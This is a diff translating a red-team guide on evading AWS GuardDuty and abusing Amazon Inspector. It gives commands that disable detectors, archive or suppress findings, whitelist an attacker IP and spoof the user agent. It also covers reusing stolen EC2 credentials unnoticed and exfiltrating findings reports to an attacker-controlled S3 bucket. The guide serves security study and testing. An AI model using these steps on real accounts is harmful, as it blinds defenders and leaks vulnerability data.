如果是**用户或用户访问的角色**,尽量在相同的时间、相同的地理位置(如果可能,甚至相同的ISP和IP)使用它 +- 如果是**服务使用的角色**,在相同的区域创建相同的服务,并在相同的时间范围内从那里使用 +- 始终尝试使用该主体使用的**相同权限** +- 如果需要**使用其他权限或滥用权限**(例如,下载1.000.000个cloudtrail日志文件),请**缓慢**进行,并与AWS的**最小交互量**(awscli有时在写入之前会调用多个读取API) ### Breaking GuardDuty #### `guardduty:UpdateDetector` -With this permission you could disable GuardDuty to avoid triggering alerts. 
- +使用此权限可以禁用GuardDuty,以避免触发警报。 ```bash aws guardduty update-detector --detector-id --no-enable aws guardduty update-detector --detector-id --data-sources S3Logs={Enable=false} ``` - #### `guardduty:CreateFilter` -Attackers with this permission have the capability to **employ filters for the automatic** archiving of findings: - +拥有此权限的攻击者能够**使用过滤器自动**归档发现: ```bash aws guardduty create-filter --detector-id --name --finding-criteria file:///tmp/criteria.json --action ARCHIVE ``` - #### `iam:PutRolePolicy`, (`guardduty:CreateIPSet`|`guardduty:UpdateIPSet`) -Attackers with the previous privileges could modify GuardDuty's [**Trusted IP list**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) by adding their IP address to it and avoid generating alerts. - +具有先前权限的攻击者可以通过将其 IP 地址添加到 GuardDuty 的 [**受信任的 IP 列表**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_upload-lists.html) 中来修改该列表,从而避免生成警报。 ```bash aws guardduty update-ip-set --detector-id --activate --ip-set-id --location https://some-bucket.s3-eu-west-1.amazonaws.com/attacker.csv ``` - #### `guardduty:DeletePublishingDestination` -Attackers could remove the destination to prevent alerting: - +攻击者可以删除目标以防止警报: ```bash aws guardduty delete-publishing-destination --detector-id --destination-id ``` - > [!CAUTION] -> Deleting this publishing destination will **not affect the generation or visibility of findings within the GuardDuty console**. GuardDuty will continue to analyze events in your AWS environment, identify suspicious or unexpected behavior, and generate findings. +> 删除此发布目标将**不会影响GuardDuty控制台中发现的生成或可见性**。GuardDuty将继续分析您AWS环境中的事件,识别可疑或意外行为,并生成发现。 -### Specific Findings Bypass Examples +### 特定发现绕过示例 -Note that there are tens of GuardDuty findings, however, **as Red Teamer not all of them will affect you**, and what is better, you have the f**ull documentation of each of them** in [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) so take a look before doing any action to not get caught. +请注意,GuardDuty有数十种发现,然而,**作为红队成员,并非所有发现都会影响您**,更好的是,您可以在[https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html)中找到**每个发现的完整文档**,因此在采取任何行动之前请查看,以免被抓。 -Here you have a couple of examples of specific GuardDuty findings bypasses: +以下是几个特定GuardDuty发现绕过的示例: #### [PenTest:IAMUser/KaliLinux](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux) -GuardDuty detect AWS API requests from common penetration testing tools and trigger a [PenTest Finding](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux).\ -It's detected by the **user agent name** that is passed in the API request.\ -Therefore, **modifying the user agent** it's possible to prevent GuardDuty from detecting the attack. +GuardDuty检测来自常见渗透测试工具的AWS API请求,并触发[PenTest Finding](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#pentest-iam-kalilinux)。\ +它是通过在API请求中传递的**用户代理名称**检测到的。\ +因此,**修改用户代理**可以防止GuardDuty检测到攻击。 -To prevent this you can search from the script `session.py` in the `botocore` package and modify the user agent, or set Burp Suite as the AWS CLI proxy and change the user-agent with the MitM or just use an OS like Ubuntu, Mac or Windows will prevent this alert from triggering. 
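As a quick sanity check before sending any request, you can print the user agent string botocore would attach; if it contains a distribution name such as `kali`, edit the string where botocore builds it (the exact file and function differ between botocore versions) or rewrite the header through a proxy:

```bash
# Print the user agent botocore builds for this host (Kali/Parrot/Pentoo distributions show up here)
python3 -c 'import botocore.session; print(botocore.session.Session().user_agent())'

# Locate the installed botocore sources that build the user agent, then edit them manually
python3 -c 'import botocore, os; print(os.path.dirname(botocore.__file__))'
grep -ril "user_agent" "$(python3 -c 'import botocore, os; print(os.path.dirname(botocore.__file__))')" | head
```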
+为防止这种情况,您可以在`botocore`包中的脚本`session.py`中搜索并修改用户代理,或将Burp Suite设置为AWS CLI代理,并使用MitM更改用户代理,或者仅使用Ubuntu、Mac或Windows等操作系统将防止此警报触发。 #### UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration -Extracting EC2 credentials from the metadata service and **utilizing them outside** the AWS environment activates the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws) alert. Conversely, employing these credentials from your EC2 instance triggers the [**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws) alert. Yet, **using the credentials on another compromised EC2 instance within the same account goes undetected**, raising no alert. +从元数据服务中提取EC2凭证并**在AWS环境外部使用**将激活[**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationoutsideaws)警报。相反,从您的EC2实例使用这些凭证将触发[**`UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.InsideAWS`**](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-iam.html#unauthorizedaccess-iam-instancecredentialexfiltrationinsideaws)警报。然而,**在同一账户内的另一台被攻陷的EC2实例上使用这些凭证不会被检测到**,不会引发警报。 > [!TIP] -> Therefore, **use the exfiltrated credentials from inside the machine** where you found them to not trigger this alert. +> 因此,**在您找到凭证的机器内部使用提取的凭证**以避免触发此警报。 -## References +## 参考 - [https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html](https://docs.aws.amazon.com/guardduty/latest/ug/guardduty_finding-types-active.html) - [https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html](https://docs.aws.amazon.com/guardduty/latest/ug/findings_suppression-rule.html) @@ -191,7 +181,3 @@ Extracting EC2 credentials from the metadata service and **utilizing them outsid - [https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html](https://docs.aws.amazon.com/whitepapers/latest/aws-privatelink/what-are-vpc-endpoints.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md index 655b81fa7..67c32d929 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-inspector-enum.md @@ -6,53 +6,53 @@ ### Inspector -Amazon Inspector is an advanced, automated vulnerability management service designed to enhance the security of your AWS environment. This service continuously scans Amazon EC2 instances, container images in Amazon ECR, Amazon ECS, and AWS Lambda functions for vulnerabilities and unintended network exposure. By leveraging a robust vulnerability intelligence database, Amazon Inspector provides detailed findings, including severity levels and remediation recommendations, helping organizations proactively identify and address security risks. 
This comprehensive approach ensures a fortified security posture across various AWS services, aiding in compliance and risk management. +Amazon Inspector 是一项先进的自动化漏洞管理服务,旨在增强您的 AWS 环境的安全性。该服务持续扫描 Amazon EC2 实例、Amazon ECR 中的容器镜像、Amazon ECS 和 AWS Lambda 函数,以查找漏洞和意外的网络暴露。通过利用强大的漏洞情报数据库,Amazon Inspector 提供详细的发现,包括严重性级别和修复建议,帮助组织主动识别和解决安全风险。这种全面的方法确保了在各种 AWS 服务中强化的安全态势,有助于合规性和风险管理。 ### Key elements #### Findings -Findings in Amazon Inspector are detailed reports about vulnerabilities and exposures discovered during the scan of EC2 instances, ECR repositories, or Lambda functions. Based on its state, findings are categorized as: +Amazon Inspector 中的发现是关于在 EC2 实例、ECR 存储库或 Lambda 函数扫描过程中发现的漏洞和暴露的详细报告。根据其状态,发现被分类为: -- **Active**: The finding has not been remediated. -- **Closed**: The finding has been remediated. -- **Suppressed**: The finding has been marked with this state due to one or more **suppression rules**. +- **Active**: 发现尚未修复。 +- **Closed**: 发现已被修复。 +- **Suppressed**: 由于一个或多个 **suppression rules**,发现被标记为此状态。 -Findings are also categorized into the next three types: +发现还被分类为以下三种类型: -- **Package**: These findings relate to vulnerabilities in software packages installed on your resources. Examples include outdated libraries or dependencies with known security issues. -- **Code**: This category includes vulnerabilities found in the code of applications running on your AWS resources. Common issues are coding errors or insecure practices that could lead to security breaches. -- **Network**: Network findings identify potential exposures in network configurations that could be exploited by attackers. These include open ports, insecure network protocols, and misconfigured security groups. +- **Package**: 这些发现与安装在您资源上的软件包中的漏洞有关。示例包括过时的库或具有已知安全问题的依赖项。 +- **Code**: 此类别包括在运行于您 AWS 资源上的应用程序代码中发现的漏洞。常见问题是编码错误或不安全的做法,可能导致安全漏洞。 +- **Network**: 网络发现识别网络配置中的潜在暴露,攻击者可能会利用这些暴露。这些包括开放端口、不安全的网络协议和配置错误的安全组。 #### Filters and Suppression Rules -Filters and suppression rules in Amazon Inspector help manage and prioritize findings. Filters allow you to refine findings based on specific criteria, such as severity or resource type. Suppression rules allow you to suppress certain findings that are considered low risk, have already been mitigated, or for any other important reason, preventing them from overloading your security reports and allowing you to focus on more critical issues. +Amazon Inspector 中的过滤器和抑制规则帮助管理和优先处理发现。过滤器允许您根据特定标准(如严重性或资源类型)细化发现。抑制规则允许您抑制某些被认为是低风险、已被缓解或出于其他重要原因的发现,防止它们过载您的安全报告,并允许您专注于更关键的问题。 #### Software Bill of Materials (SBOM) -A Software Bill of Materials (SBOM) in Amazon Inspector is an exportable nested inventory list detailing all the components within a software package, including libraries and dependencies. SBOMs help provide transparency into the software supply chain, enabling better vulnerability management and compliance. They are crucial for identifying and mitigating risks associated with open source and third-party software components. +Amazon Inspector 中的软件材料清单 (SBOM) 是一个可导出的嵌套清单,详细列出了软件包中的所有组件,包括库和依赖项。SBOM 有助于提供软件供应链的透明度,从而实现更好的漏洞管理和合规性。它们对于识别和缓解与开源和第三方软件组件相关的风险至关重要。 ### Key features #### Export findings -Amazon Inspector offers the capability to export findings to Amazon S3 Buckets, Amazon EventBridge and AWS Security Hub, which enables you to generate detailed reports of identified vulnerabilities and exposures for further analysis or sharing at a specific date and time. 
This feature supports various output formats such as CSV and JSON, making it easier to integrate with other tools and systems. The export functionality allows customization of the data included in the reports, enabling you to filter findings based on specific criteria like severity, resource type, or date range and including by default all of your findings in the current AWS Region with an Active status. +Amazon Inspector 提供将发现导出到 Amazon S3 Buckets、Amazon EventBridge 和 AWS Security Hub 的能力,使您能够生成已识别漏洞和暴露的详细报告,以便在特定日期和时间进行进一步分析或共享。此功能支持多种输出格式,如 CSV 和 JSON,使其更易于与其他工具和系统集成。导出功能允许自定义报告中包含的数据,使您能够根据特定标准(如严重性、资源类型或日期范围)过滤发现,并默认包括您当前 AWS 区域中所有处于活动状态的发现。 -When exporting findings, a Key Management Service (KMS) key is necessary to encrypt the data during export. KMS keys ensure that the exported findings are protected against unauthorized access, providing an extra layer of security for sensitive vulnerability information. +导出发现时,需要一个密钥管理服务 (KMS) 密钥来加密导出过程中的数据。KMS 密钥确保导出的发现受到未授权访问的保护,为敏感漏洞信息提供额外的安全层。 #### Amazon EC2 instances scanning -Amazon Inspector offers robust scanning capabilities for Amazon EC2 instances to detect vulnerabilities and security issues. Inspector compared extracted metadata from the EC2 instance against rules from security advisories in order to produce package vulnerabilities and network reachability issues. These scans can be performed through **agent-based** or **agentless** methods, depending on the **scan mode** settings configuration of your account. +Amazon Inspector 提供强大的扫描能力,以检测 Amazon EC2 实例中的漏洞和安全问题。Inspector 将提取的元数据与安全建议中的规则进行比较,以生成软件包漏洞和网络可达性问题。这些扫描可以通过 **agent-based** 或 **agentless** 方法执行,具体取决于您帐户的 **scan mode** 设置配置。 -- **Agent-Based**: Utilizes the AWS Systems Manager (SSM) agent to perform in-depth scans. This method allows for comprehensive data collection and analysis directly from the instance. -- **Agentless**: Provides a lightweight alternative that does not require installing an agent on the instance, creating an EBS snapshot of every volume of the EC2 instance, looking for vulnerabilities, and then deleting it; leveraging existing AWS infrastructure for scanning. +- **Agent-Based**: 利用 AWS Systems Manager (SSM) 代理进行深入扫描。此方法允许直接从实例进行全面的数据收集和分析。 +- **Agentless**: 提供一种轻量级替代方案,无需在实例上安装代理,创建 EC2 实例每个卷的 EBS 快照,查找漏洞,然后删除它;利用现有的 AWS 基础设施进行扫描。 -The scan mode determines which method will be used to perform EC2 scans: +扫描模式决定将使用哪种方法执行 EC2 扫描: -- **Agent-Based**: Involves installing the SSM agent on EC2 instances for deep inspection. -- **Hybrid Scanning**: Combines both agent-based and agentless methods to maximize coverage and minimize performance impact. In those EC2 instances where the SSM agent is installed, Inspector will perform an agent-based scan, and for those where there is no SSM agent, the scan performed will be agentless. +- **Agent-Based**: 涉及在 EC2 实例上安装 SSM 代理以进行深度检查。 +- **Hybrid Scanning**: 结合了基于代理和无代理的方法,以最大化覆盖范围并最小化性能影响。在安装了 SSM 代理的 EC2 实例中,Inspector 将执行基于代理的扫描,而在没有 SSM 代理的实例中,执行的扫描将是无代理的。 -Another important feature is the **deep inspection** for EC2 Linux instances. This feature offers thorough analysis of the software and configuration of EC2 Linux instances, providing detailed vulnerability assessments, including operating system vulnerabilities, application vulnerabilities, and misconfigurations, ensuring a comprehensive security evaluation. This is achieved through the inspection of **custom paths** and all of its sub-directories. 
By default, Amazon Inspector will scan the following, but each member account can define up to 5 more custom paths, and each delegated administrator up to 10: +另一个重要特性是对 EC2 Linux 实例的 **deep inspection**。此功能提供对 EC2 Linux 实例的软件和配置的全面分析,提供详细的漏洞评估,包括操作系统漏洞、应用程序漏洞和配置错误,确保全面的安全评估。这是通过检查 **custom paths** 及其所有子目录实现的。默认情况下,Amazon Inspector 将扫描以下路径,但每个成员帐户可以定义最多 5 个自定义路径,每个委派管理员最多 10 个: - `/usr/lib` - `/usr/lib64` @@ -61,28 +61,27 @@ Another important feature is the **deep inspection** for EC2 Linux instances. Th #### Amazon ECR container images scanning -Amazon Inspector provides robust scanning capabilities for Amazon Elastic Container Registry (ECR) container images, ensuring that package vulnerabilities are detected and managed efficiently. +Amazon Inspector 提供强大的扫描能力,以确保 Amazon Elastic Container Registry (ECR) 容器镜像中的软件包漏洞被有效检测和管理。 -- **Basic Scanning**: This is a quick and lightweight scan that identifies known OS packages vulnerabilities in container images using a standard set of rules from the open-source Clair project. With this scanning configuration, your repositories will be scanned on push, or performing manual scans. -- **Enhanced Scanning**: This option adds the continuous scanning feature in addition to the on push scan. Enhanced scanning dives deeper into the layers of each container image to identify vulnerabilities in OS packages and in programming languages packages with higher accuracy. It analyzes both the base image and any additional layers, providing a comprehensive view of potential security issues. +- **Basic Scanning**: 这是一个快速且轻量级的扫描,使用来自开源 Clair 项目的标准规则识别容器镜像中的已知操作系统软件包漏洞。使用此扫描配置,您的存储库将在推送时扫描,或执行手动扫描。 +- **Enhanced Scanning**: 此选项在推送扫描的基础上增加了持续扫描功能。增强扫描深入每个容器镜像的层,以更高的准确性识别操作系统软件包和编程语言软件包中的漏洞。它分析基础镜像和任何附加层,提供潜在安全问题的全面视图。 #### Amazon Lambda functions scanning -Amazon Inspector includes comprehensive scanning capabilities for AWS Lambda functions and its layers, ensuring the security and integrity of serverless applications. Inspector offers two types of scanning for Lambda functions: +Amazon Inspector 包括对 AWS Lambda 函数及其层的全面扫描能力,确保无服务器应用程序的安全性和完整性。Inspector 为 Lambda 函数提供两种类型的扫描: -- **Lambda standard scanning**: This default feature identifies software vulnerabilities in the application package dependencies added to your Lambda function and layers. For instance, if your function uses a version of a library like python-jwt with a known vulnerability, it generates a finding. -- **Lambda code scanning**: Analyzes custom application code for security issues, detecting vulnerabilities like injection flaws, data leaks, weak cryptography, and missing encryption. It captures code snippets highlighting detected vulnerabilities, such as hardcoded credentials. Findings include detailed remediation suggestions and code snippets for fixing the issues. +- **Lambda standard scanning**: 此默认功能识别添加到您的 Lambda 函数和层中的应用程序包依赖项中的软件漏洞。例如,如果您的函数使用了具有已知漏洞的库版本,如 python-jwt,则会生成发现。 +- **Lambda code scanning**: 分析自定义应用程序代码中的安全问题,检测诸如注入缺陷、数据泄露、弱加密和缺失加密等漏洞。它捕获突出显示检测到的漏洞的代码片段,例如硬编码凭据。发现包括详细的修复建议和修复问题的代码片段。 #### **Center for Internet Security (CIS) scans** -Amazon Inspector includes CIS scans to benchmark Amazon EC2 instance operating systems against best practice recommendations from the Center for Internet Security (CIS). These scans ensure configurations adhere to industry-standard security baselines. 
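A read-only sketch for checking whether CIS scans are set up and what they have produced (the `list-cis-*` operations were added together with the CIS feature, so older CLI versions may not expose them):

```bash
# CIS scan configurations: schedule, benchmark level and targeted accounts/tags
aws inspector2 list-cis-scan-configurations

# CIS scans that have actually run and their status
aws inspector2 list-cis-scans
```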
+Amazon Inspector 包括 CIS 扫描,以基准 Amazon EC2 实例操作系统与来自互联网安全中心 (CIS) 的最佳实践建议。这些扫描确保配置符合行业标准的安全基线。 -- **Configuration**: CIS scans evaluate if system configurations meet specific CIS Benchmark recommendations, with each check linked to a CIS check ID and title. -- **Execution**: Scans are performed or scheduled based on instance tags and defined schedules. -- **Results**: Post-scan results indicate which checks passed, skipped, or failed, providing insight into the security posture of each instance. +- **Configuration**: CIS 扫描评估系统配置是否符合特定的 CIS 基准建议,每个检查都与 CIS 检查 ID 和标题相关联。 +- **Execution**: 扫描根据实例标签和定义的计划执行或安排。 +- **Results**: 扫描后的结果指示哪些检查通过、跳过或失败,提供每个实例安全态势的洞察。 ### Enumeration - ```bash # Administrator and member accounts # @@ -111,7 +110,7 @@ aws inspector2 list-findings aws inspector2 batch-get-finding-details --finding-arns ## List statistical and aggregated finding data (ReadOnlyAccess policy is enough for this) aws inspector2 list-finding-aggregations --aggregation-type [--account-ids ] +| ACCOUNT AWS_LAMBDA_FUNCTION | LAMBDA_LAYER> [--account-ids ] ## Retrieve code snippet information about one or more specified code vulnerability findings aws inspector2 batch-get-code-snippet --finding-arns ## Retrieve the status for the specified findings report (ReadOnlyAccess policy is enough for this) @@ -183,113 +182,101 @@ aws inspector list-exclusions --assessment-run-arn ## Rule packages aws inspector list-rules-packages ``` - ### Post Exploitation > [!TIP] -> From an attackers perspective, this service can help the attacker to find vulnerabilities and network exposures that could help him to compromise other instances/containers. +> 从攻击者的角度来看,这项服务可以帮助攻击者找到可能帮助他攻陷其他实例/容器的漏洞和网络暴露。 > -> However, an attacker could also be interested in disrupting this service so the victim cannot see vulnerabilities (all or specific ones). +> 然而,攻击者也可能对破坏这项服务感兴趣,以便受害者无法看到漏洞(所有或特定的漏洞)。 #### `inspector2:CreateFindingsReport`, `inspector2:CreateSBOMReport` -An attacker could generate detailed reports of vulnerabilities or software bill of materials (SBOMs) and exfiltrate them from your AWS environment. This information could be exploited to identify specific weaknesses, outdated software, or insecure dependencies, enabling targeted attacks. - +攻击者可以生成漏洞或软件材料清单(SBOM)的详细报告,并从您的AWS环境中提取这些报告。这些信息可以被利用来识别特定的弱点、过时的软件或不安全的依赖关系,从而实现针对性的攻击。 ```bash # Findings report aws inspector2 create-findings-report --report-format --s3-destination [--filter-criteria ] # SBOM report aws inspector2 create-sbom-report --report-format --s3-destination [--resource-filter-criteria ] ``` +以下示例展示了如何将所有活动发现从 Amazon Inspector 导出到攻击者控制的 Amazon S3 Bucket,并使用攻击者控制的 Amazon KMS 密钥: -The following example shows how to exfiltrate all the Active findings from Amazon Inspector to an attacker controlled Amazon S3 Bucket with an attacker controlled Amazon KMS key: - -1. **Create an Amazon S3 Bucket** and attach a policy to it in order to be accessible from the victim Amazon Inspector: - +1. 
**创建一个 Amazon S3 Bucket** 并附加一个策略,以便从受害者的 Amazon Inspector 访问: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Sid": "allow-inspector", - "Effect": "Allow", - "Principal": { - "Service": "inspector2.amazonaws.com" - }, - "Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"], - "Resource": "arn:aws:s3:::inspector-findings/*", - "Condition": { - "StringEquals": { - "aws:SourceAccount": "" - }, - "ArnLike": { - "aws:SourceArn": "arn:aws:inspector2:us-east-1::report/*" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Sid": "allow-inspector", +"Effect": "Allow", +"Principal": { +"Service": "inspector2.amazonaws.com" +}, +"Action": ["s3:PutObject", "s3:PutObjectAcl", "s3:AbortMultipartUpload"], +"Resource": "arn:aws:s3:::inspector-findings/*", +"Condition": { +"StringEquals": { +"aws:SourceAccount": "" +}, +"ArnLike": { +"aws:SourceArn": "arn:aws:inspector2:us-east-1::report/*" +} +} +} +] } ``` - -2. **Create an Amazon KMS key** and attach a policy to it in order to be usable by the victim’s Amazon Inspector: - +2. **创建一个 Amazon KMS 密钥** 并为其附加一个策略,以便受害者的 Amazon Inspector 可以使用: ```json { - "Version": "2012-10-17", - "Id": "key-policy", - "Statement": [ - { - ... - }, - { - "Sid": "Allow victim Amazon Inspector to use the key", - "Effect": "Allow", - "Principal": { - "Service": "inspector2.amazonaws.com" - }, - "Action": [ - "kms:Encrypt", - "kms:Decrypt", - "kms:ReEncrypt*", - "kms:GenerateDataKey*", - "kms:DescribeKey" - ], - "Resource": "*", - "Condition": { - "StringEquals": { - "aws:SourceAccount": "" - } - } - } - ] +"Version": "2012-10-17", +"Id": "key-policy", +"Statement": [ +{ +... +}, +{ +"Sid": "Allow victim Amazon Inspector to use the key", +"Effect": "Allow", +"Principal": { +"Service": "inspector2.amazonaws.com" +}, +"Action": [ +"kms:Encrypt", +"kms:Decrypt", +"kms:ReEncrypt*", +"kms:GenerateDataKey*", +"kms:DescribeKey" +], +"Resource": "*", +"Condition": { +"StringEquals": { +"aws:SourceAccount": "" +} +} +} +] } ``` - -3. Execute the command to **create the findings report** exfiltrating it: - +3. 执行命令以**创建发现报告**并将其外泄: ```bash aws --region us-east-1 inspector2 create-findings-report --report-format CSV --s3-destination bucketName=,keyPrefix=exfiltration_,kmsKeyArn=arn:aws:kms:us-east-1:123456789012:key/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f ``` - -- **Potential Impact**: Generation and exfiltration of detailed vulnerability and software reports, gaining insights into specific vulnerabilities and security weaknesses. +- **潜在影响**: 生成和外泄详细的漏洞和软件报告,获取特定漏洞和安全弱点的见解。 #### `inspector2:CancelFindingsReport`, `inspector2:CancelSbomExport` -An attacker could cancel the generation of the specified findings report or SBOM report, preventing security teams from receiving timely information about vulnerabilities and software bill of materials (SBOMs), delaying the detection and remediation of security issues. - +攻击者可以取消指定的发现报告或SBOM报告的生成,阻止安全团队及时获取有关漏洞和软件材料清单(SBOM)的信息,从而延迟安全问题的检测和修复。 ```bash # Cancel findings report generation aws inspector2 cancel-findings-report --report-id # Cancel SBOM report generatiom aws inspector2 cancel-sbom-export --report-id ``` - -- **Potential Impact**: Disruption of security monitoring and prevention of timely detection and remediation of security issues. 
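In both the exfiltration and the cancellation scenarios described here, the state of a report can be confirmed afterwards. A hedged sketch (report IDs are placeholders; the findings-report status call is the same read-only call mentioned in the enumeration section):

```bash
# Check whether a findings report completed, failed or was cancelled
aws inspector2 get-findings-report-status --report-id <report-id>
# Same idea for an SBOM export
aws inspector2 get-sbom-export --report-id <report-id>
```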
+- **潜在影响**:中断安全监控,阻碍及时发现和修复安全问题。 #### `inspector2:CreateFilter`, `inspector2:UpdateFilter`, `inspector2:DeleteFilter` -An attacker with these permissions would be able manipulate the filtering rules that determine which vulnerabilities and security issues are reported or suppressed (if the **action** is set to SUPPRESS, a suppression rule would be created). This could hide critical vulnerabilities from security administrators, making it easier to exploit these weaknesses without detection. By altering or removing important filters, an attacker could also create noise by flooding the system with irrelevant findings, hindering effective security monitoring and response. - +拥有这些权限的攻击者将能够操纵过滤规则,这些规则决定了哪些漏洞和安全问题被报告或抑制(如果**action**设置为SUPPRESS,将创建一个抑制规则)。这可能会使安全管理员无法看到关键漏洞,从而更容易在未被发现的情况下利用这些弱点。通过更改或删除重要过滤器,攻击者还可以通过向系统发送无关的发现来制造噪音,从而妨碍有效的安全监控和响应。 ```bash # Create aws inspector2 create-filter --action --filter-criteria --name [--reason ] @@ -298,93 +285,78 @@ aws inspector2 update-filter --filter-arn [--action ] [ # Delete aws inspector2 delete-filter --arn ``` - -- **Potential Impact**: Concealment or suppression of critical vulnerabilities, or flooding the system with irrelevant findings. +- **潜在影响**:隐瞒或压制关键漏洞,或用无关的发现淹没系统。 #### `inspector2:DisableDelegatedAdminAccount`, (`inspector2:EnableDelegatedAdminAccount` & `organizations:ListDelegatedAdministrators` & `organizations:EnableAWSServiceAccess` & `iam:CreateServiceLinkedRole`) -An attacker could significantly disrupt the security management structure. +攻击者可能会显著破坏安全管理结构。 -- Disabling the delegated admin account, the attacker could prevent the security team from accessing and managing Amazon Inspector settings and reports. -- Enabling an unauthorized admin account would allow an attacker to control security configurations, potentially disabling scans or modifying settings to hide malicious activities. +- 禁用委托管理员账户,攻击者可以阻止安全团队访问和管理 Amazon Inspector 设置和报告。 +- 启用未经授权的管理员账户将允许攻击者控制安全配置,可能会禁用扫描或修改设置以隐藏恶意活动。 > [!WARNING] -> It is required for the unauthorized account to be in the same Organization as the victim in order to become the delegated administrator. +> 未经授权的账户必须与受害者在同一组织中才能成为委托管理员。 > -> In order for the unauthorized account to become the delegated administrator, it is also required that after the legitimate delegated administrator is disabled, and before the unauthorized account is enabled as the delegated administrator, the legitimate administrator must be deregistered as the delegated administrator from the organization. . This can be done with the following command (**`organizations:DeregisterDelegatedAdministrator`** permission required): **`aws organizations deregister-delegated-administrator --account-id --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`** - +> 为了让未经授权的账户成为委托管理员,还要求在合法的委托管理员被禁用后,以及在未经授权的账户被启用为委托管理员之前,合法管理员必须从组织中注销为委托管理员。这可以通过以下命令完成(**`organizations:DeregisterDelegatedAdministrator`** 权限要求):**`aws organizations deregister-delegated-administrator --account-id --service-principal [inspector2.amazonaws.com](http://inspector2.amazonaws.com/)`** ```bash # Disable aws inspector2 disable-delegated-admin-account --delegated-admin-account-id # Enable aws inspector2 enable-delegated-admin-account --delegated-admin-account-id ``` - -- **Potential Impact**: Disruption of the security management. +- **潜在影响**: 安全管理的中断。 #### `inspector2:AssociateMember`, `inspector2:DisassociateMember` -An attacker could manipulate the association of member accounts within an Amazon Inspector organization. 
By associating unauthorized accounts or disassociating legitimate ones, an attacker could control which accounts are included in security scans and reporting. This could lead to critical accounts being excluded from security monitoring, enabling the attacker to exploit vulnerabilities in those accounts without detection. +攻击者可以操纵Amazon Inspector组织内成员账户的关联。通过关联未经授权的账户或取消合法账户的关联,攻击者可以控制哪些账户被纳入安全扫描和报告。这可能导致关键账户被排除在安全监控之外,使攻击者能够在这些账户中利用漏洞而不被发现。 > [!WARNING] -> This action requires to be performed by the delegated administrator. - +> 此操作需要由委派的管理员执行。 ```bash # Associate aws inspector2 associate-member --account-id # Disassociate aws inspector2 disassociate-member --account-id ``` - -- **Potential Impact**: Exclusion of key accounts from security scans, enabling undetected exploitation of vulnerabilities. +- **潜在影响**: 关键账户被排除在安全扫描之外,使得漏洞的利用未被检测到。 #### `inspector2:Disable`, (`inspector2:Enable` & `iam:CreateServiceLinkedRole`) -An attacker with the `inspector2:Disable` permission would be able to disable security scans on specific resource types (EC2, ECR, Lambda, Lambda code) over the specified accounts, leaving parts of the AWS environment unmonitored and vulnerable to attacks. In addition, owing the **`inspector2:Enable`** & **`iam:CreateServiceLinkedRole`** permissions, an attacker could then re-enable scans selectively to avoid detection of suspicious configurations. +拥有 `inspector2:Disable` 权限的攻击者将能够在指定账户上禁用特定资源类型(EC2, ECR, Lambda, Lambda 代码)的安全扫描,从而使 AWS 环境的部分区域未被监控并易受攻击。此外,由于拥有 **`inspector2:Enable`** 和 **`iam:CreateServiceLinkedRole`** 权限,攻击者可以选择性地重新启用扫描,以避免检测到可疑配置。 > [!WARNING] -> This action requires to be performed by the delegated administrator. - +> 此操作需要由委派的管理员执行。 ```bash # Disable aws inspector2 disable --account-ids [--resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}>] # Enable aws inspector2 enable --resource-types <{EC2, ECR, LAMBDA, LAMBDA_CODE}> [--account-ids ] ``` - -- **Potential Impact**: Creation of blind spots in the security monitoring. +- **潜在影响**: 在安全监控中创建盲点。 #### `inspector2:UpdateOrganizationConfiguration` -An attacker with this permission would be able to update the configurations for your Amazon Inspector organization, affecting the default scanning features enabled for new member accounts. +拥有此权限的攻击者将能够更新您 Amazon Inspector 组织的配置,影响新成员账户启用的默认扫描功能。 > [!WARNING] -> This action requires to be performed by the delegated administrator. - +> 此操作需要由委派管理员执行。 ```bash aws inspector2 update-organization-configuration --auto-enable ``` - -- **Potential Impact**: Alter security scan policies and configurations for the organization. +- **潜在影响**: 更改组织的安全扫描策略和配置。 #### `inspector2:TagResource`, `inspector2:UntagResource` -An attacker could manipulate tags on AWS Inspector resources, which are critical for organizing, tracking, and automating security assessments. By altering or removing tags, an attacker could potentially hide vulnerabilities from security scans, disrupt compliance reporting, and interfere with automated remediation processes, leading to unchecked security issues and compromised system integrity. - 